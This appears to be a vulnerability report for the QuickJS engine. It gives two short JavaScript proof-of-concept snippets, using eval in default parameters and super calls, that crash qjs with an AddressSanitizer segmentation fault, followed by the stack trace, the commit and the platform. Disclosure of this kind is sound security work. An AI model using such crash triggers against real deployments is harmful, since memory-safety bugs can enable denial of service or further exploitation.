```javascript
class e {
  method({} = eval(" var arguments ='–� ")) {
    arguments[undefined] = arguments[0];
    this - this.method();
    return arguments;
  }
}
class t extends e {
  method(...e) {
    return super.method(...e);
  }
}
var r = new t();
r.method();
r.method();
r.method();
```

```javascript
class e {
  method({} = eval("")) {}
}
class t extends e {
  method(...e) {
    return super.method();
  }
}
var r = new t();
r.method();
```
Execution steps & Output
```
$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1074913==ERROR: AddressSanitizer: SEGV on unknown address 0x6120001018b4 (pc 0x564b1c4dd487 bp 0x7ffce71e0450 sp 0x7ffce71e0290 T0)
==1074913==The signal is caused by a READ memory access.
    #0 0x564b1c4dd486 in add_closure_variables quickjs/quickjs.c:31101
    #1 0x564b1c4dd486 in __JS_EvalInternal quickjs/quickjs.c:34444
    #2 0x564b1c406d2e in JS_EvalInternal quickjs/quickjs.c:34501
    #3 0x564b1c406d2e in JS_EvalObject quickjs/quickjs.c:34517
    #4 0x564b1c3a5155 in JS_CallInternal quickjs/quickjs.c:16761
    #5 0x564b1c391edb in JS_CallInternal quickjs/quickjs.c:16615
    #6 0x564b1c391edb in JS_CallInternal quickjs/quickjs.c:16615
    #7 0x564b1c3b3649 in JS_CallFree quickjs/quickjs.c:18694
    #8 0x564b1c4da9a1 in JS_EvalFunctionInternal quickjs/quickjs.c:34348
    #9 0x564b1c4de0d2 in __JS_EvalInternal quickjs/quickjs.c:34483
    #10 0x564b1c4d1f48 in JS_EvalInternal quickjs/quickjs.c:34501
    #11 0x564b1c4d1f48 in JS_EvalThis quickjs/quickjs.c:34532
    #12 0x564b1c4d1fd7 in JS_Eval quickjs/quickjs.c:34540
    #13 0x564b1c3654d2 in eval_buf quickjs/qjs.c:71
    #14 0x564b1c365a42 in eval_file quickjs/qjs.c:103
    #15 0x564b1c3648d4 in main quickjs/qjs.c:516
    #16 0x7f27c95c0082 in __libc_start_main ../csu/libc-start.c:308
    #17 0x564b1c364e4d in _start (quickjs/qjs+0x35e4d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV quickjs/quickjs.c:31101 in add_closure_variables
==1074913==ABORTING
```
QuickJS Version
Version : https://github.com/bellard/quickjs/commit/6a89d7c27099be84e5312a7ec73205d6a7abe1b4
platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build
Credits: @Ye0nny, @EJueon